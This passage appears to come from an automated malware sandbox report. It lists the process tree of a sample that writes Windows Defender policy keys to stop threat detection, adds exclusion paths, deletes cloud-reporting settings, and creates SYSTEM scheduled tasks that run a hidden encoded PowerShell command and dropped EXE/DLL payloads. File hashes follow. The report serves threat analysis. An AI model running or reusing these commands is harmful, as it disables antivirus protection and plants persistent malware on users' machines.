6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1712
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4896
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VMeMEPztOsUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VMeMEPztOsUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VpeeuBoLdsfCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VpeeuBoLdsfCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kFdzwgcsqDZevnSgonR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kFdzwgcsqDZevnSgonR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mMQoIZnNGNdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mMQoIZnNGNdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mgLqjNPWU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mgLqjNPWU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JVfpBtJrTNfNsQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JVfpBtJrTNfNsQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\pIYRwKxBaOzqikCb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\pIYRwKxBaOzqikCb\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1440 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMeMEPztOsUn" /t REG_DWORD /d 0 /reg:323⤵PID:3056
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMeMEPztOsUn" /t REG_DWORD /d 0 /reg:324⤵PID:3632
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VMeMEPztOsUn" /t REG_DWORD /d 0 /reg:643⤵PID:1292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpeeuBoLdsfCC" /t REG_DWORD /d 0 /reg:323⤵PID:1960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpeeuBoLdsfCC" /t REG_DWORD /d 0 /reg:643⤵PID:1000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kFdzwgcsqDZevnSgonR" /t REG_DWORD /d 0 /reg:323⤵PID:4196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kFdzwgcsqDZevnSgonR" /t REG_DWORD /d 0 /reg:643⤵PID:8
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mMQoIZnNGNdU2" /t REG_DWORD /d 0 /reg:323⤵PID:2052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mMQoIZnNGNdU2" /t REG_DWORD /d 0 /reg:643⤵PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgLqjNPWU" /t REG_DWORD /d 0 /reg:323⤵PID:4588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgLqjNPWU" /t REG_DWORD /d 0 /reg:643⤵PID:2824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JVfpBtJrTNfNsQVB /t REG_DWORD /d 0 /reg:323⤵PID:5040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JVfpBtJrTNfNsQVB /t REG_DWORD /d 0 /reg:643⤵PID:3092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq /t REG_DWORD /d 0 /reg:323⤵PID:3252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq /t REG_DWORD /d 0 /reg:643⤵PID:3004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\pIYRwKxBaOzqikCb /t REG_DWORD /d 0 /reg:323⤵PID:520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\pIYRwKxBaOzqikCb /t REG_DWORD /d 0 /reg:643⤵PID:3688
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUvcQasXV" /SC once /ST 01:23:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4204
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUvcQasXV"2⤵PID:616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUvcQasXV"2⤵PID:1692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CeimXGcICqHikUZiG" /SC once /ST 03:40:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\pIYRwKxBaOzqikCb\TMXdAXJyTNtvwTc\IPWdkTc.exe\" aV /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CeimXGcICqHikUZiG"2⤵PID:4224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1136 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1144
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2376
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1672
-
C:\Windows\Temp\pIYRwKxBaOzqikCb\TMXdAXJyTNtvwTc\IPWdkTc.exeC:\Windows\Temp\pIYRwKxBaOzqikCb\TMXdAXJyTNtvwTc\IPWdkTc.exe aV /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4672 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bVPnZmTmfBquXJeKIT"2⤵PID:3436
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4632
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:3580
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3932
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\mgLqjNPWU\xlUxoh.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "UQjVtDzLrufMISZ" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UQjVtDzLrufMISZ2" /F /xml "C:\Program Files (x86)\mgLqjNPWU\ducyvKD.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "UQjVtDzLrufMISZ"2⤵PID:224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UQjVtDzLrufMISZ"2⤵PID:1104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xeEdlWwvgDggxE" /F /xml "C:\Program Files (x86)\mMQoIZnNGNdU2\dUhjECQ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HbWXyotuKGwUi2" /F /xml "C:\ProgramData\JVfpBtJrTNfNsQVB\DNbRORs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KNgpXyLxjztSEzXEY2" /F /xml "C:\Program Files (x86)\kFdzwgcsqDZevnSgonR\pJwbNMt.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ldzZDPvmezBaAizzQJS2" /F /xml "C:\Program Files (x86)\VpeeuBoLdsfCC\dJNhyRi.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rTRcbUUPNNGcKFAGn" /SC once /ST 00:22:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\pIYRwKxBaOzqikCb\PiUDbzhg\NNzRGCf.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "rTRcbUUPNNGcKFAGn"2⤵PID:1996
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4960
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4264
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:752
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2412
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CeimXGcICqHikUZiG"2⤵PID:4204
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\pIYRwKxBaOzqikCb\PiUDbzhg\NNzRGCf.dll",#1 /site_id 5254031⤵PID:3092
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\pIYRwKxBaOzqikCb\PiUDbzhg\NNzRGCf.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4992 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rTRcbUUPNNGcKFAGn"3⤵PID:1688
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5c5dd0a7bef7b9eb97e2600c016ef4a4a
SHA16aac10e61efe2d4023de10b00f2419b506e71f4c
SHA256b24a5167f051f041f9053321bbc634eed59b6cb8d81cdf7f78722a6bc702f292
SHA5126102a3d750682a8a26841c107dd844b36379134f4f8d8b4827decaa3cac927cf83da51b1cc245e541222f010c839ecb8c77aa8bf5d45d4924f15321847711f41
-
Filesize
2KB
MD5b67d29fbc9dcabff26873eb725e59550
SHA170e29216a6d48f294c09d3c961e979b86a595250
SHA2562d6543328da99f9001be37a1dfdc5f75afe3cfeda7173b0d34ab662f4254c666
SHA512f1ec6bdf054cb12fbae66fc20b837caac4df39d31a957618289a5b5003e6637ef0dd56899835aee86a716edf4cf533b3db341f31401dad05886d6cb3dcd474a1
-
Filesize
2KB
MD51833ca5233f21c9f99b504077234d2af
SHA196bf85363f5a7000f408af0c46999d318df1a35b
SHA256ad28ab57fd43a285022787359c969f13671a9f9f17215a68cf19f377c23b4532
SHA5126a18809f0bb2519d00d394387c8061d718322340e11135378a5e2525d4305ba0931dc3507cdcf718e0e6b470bc6621aa03ca4e55d864e834929b607f4f1837b5
-
Filesize
2KB
MD514f445568f2a05af65df1871be2bfbe7
SHA1eb87b7f83d9c79a32fb849cfa09599c916f03665
SHA256f722cb7535dc52a023df58eca51bb1b8bfb5cef9a615936c23e4341cca2473d6
SHA5124bd0c0a3666461431a8937a6e099c67b797872932583c86c0cd487644cb9318d8456371f93035c71442fa8856b1584b4f33aea0b9d5a21c2ab1e91e0efa809a6
-
Filesize
2KB
MD5555e1798aea77bf09641e539a5f23d0e
SHA181b84ec866e2fa859fb5bca78ebc7493f8490eda
SHA2566280dc3d88bee38ea6b710806d98e65de8aad5cd6c72b869549735aac4823e0f
SHA51252b1084ebb1c22f1755ab1b9e04011a9956d621e0e86623eb803256d30a358fed0abadee27de950931573bab49e0acb18bc855772765b2faf257ebacabc92d30
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
6.3MB
MD579283500138b064632c294cabf8a5297
SHA12fc92733892e91fd09266917fc31e25c081ac60a
SHA2564fed1d7c5efc1db3110a572ef50ddb4cc1ee4b1d7fcf169aed264f9c50cc3eed
SHA5123bd3f462a917c736daf505e767e1de1acf9311d0602e4cc379a19189f3d15600441d6aa7ba64cf232cd8b44ebe1b60fe2bc3f3fb981564fa9139fe0f3d6f54ce
-
Filesize
6.3MB
MD579283500138b064632c294cabf8a5297
SHA12fc92733892e91fd09266917fc31e25c081ac60a
SHA2564fed1d7c5efc1db3110a572ef50ddb4cc1ee4b1d7fcf169aed264f9c50cc3eed
SHA5123bd3f462a917c736daf505e767e1de1acf9311d0602e4cc379a19189f3d15600441d6aa7ba64cf232cd8b44ebe1b60fe2bc3f3fb981564fa9139fe0f3d6f54ce
-
Filesize
6.8MB
MD52ed82896a6b7652fa072bb4215c6c995
SHA13da759219e664fc52fb90ebe5de4c936b5a2c2c8
SHA25639518a69752ae103245cee745aa7c7f70835d4ba3e1ef6491acb8f9a2156ba7e
SHA512f48d7324b2b85a55d31115e7607decac91051d9361d656a5c3bcb2cbb01cd8b5fcedf385aad6f1c3f1eb0fa21e11f06c91665f3ae531281cc09862bf31d458c3
-
Filesize
6.8MB
MD52ed82896a6b7652fa072bb4215c6c995
SHA13da759219e664fc52fb90ebe5de4c936b5a2c2c8
SHA25639518a69752ae103245cee745aa7c7f70835d4ba3e1ef6491acb8f9a2156ba7e
